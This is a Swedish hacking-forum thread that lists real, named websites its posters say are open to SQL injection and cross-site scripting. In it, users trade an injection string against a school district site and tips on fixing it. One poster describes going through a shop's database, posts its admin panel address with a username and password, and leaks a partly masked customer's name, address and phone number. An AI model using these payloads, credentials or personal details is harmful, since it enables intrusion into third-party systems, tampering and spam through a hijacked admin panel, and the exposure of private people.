Samling av sidor med säkerhetsbrister - Del 2

Kan du ge den exakta länken du vet ' saken

http://www.gafvert.net/indexmsp.asp?...id=1&artid=491

http://www.gafvert.net/index.asp?id=3&subid=1&orgid=1
Även här sårbart för SQLi.

Men några 500+ användare har jag inte hittat, vilken tabell skulle dessa ligga i isåfall?

http://us.trendmicro.com/us/search/i...;%3C/script%3E

(:

www.papercutshop.se/003.php?ID=12289

Ingen annan än jag som varit runt o rotat i deras databas?
Under "u1313788_3" finns ju "kunder" där både eposten och lösenorden är i klartext!

Sen kan man alltid gå in på deras hemsida ändra priser eller skicka ut spamm genom deras admin panel som ni hittar på

http://www.papercutshop.se/admin/

user/pass

dd/9LeN7aP


Eller om ni vill så kan ni kontakta dom på!

Kontakta oss:
Tel. +46 8 133574
Email: info@papercutshop.se

Kund: Henr** Schyffe**
Hackspettsvä*** 3
167 65
Bromma
henrik.sch*****@telia.com +46 70 733 ****

Lite intressant, han hade nog inte blivit så glad va ?

Nepp det hade han nog inte blivit!

Frågan är bara varför fixar dom inte hålet?

http://www.cmcss.net/Schools/schoolw....asp?locid=230

Hålet är väl numera fixat ?

- Vad exakt är hackat ? kanske är lite trög men jag kommer ingenvart ?


_______________________________

TILF ! Epic Win ! http://www.cmcss.net/Schools/schoolw...asp?empid=1026

http://www.cmcss.net/Schools/schoolwebsites/administration.asp?locid=230%27%20UNION%20SELECT%2 0ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Någon som vet hur man löser detta felet?


17 kolumner ska det vara

UNION ALL SELECT inte UNION SELECT ALL.

Ojssan! samma error kvarstår dock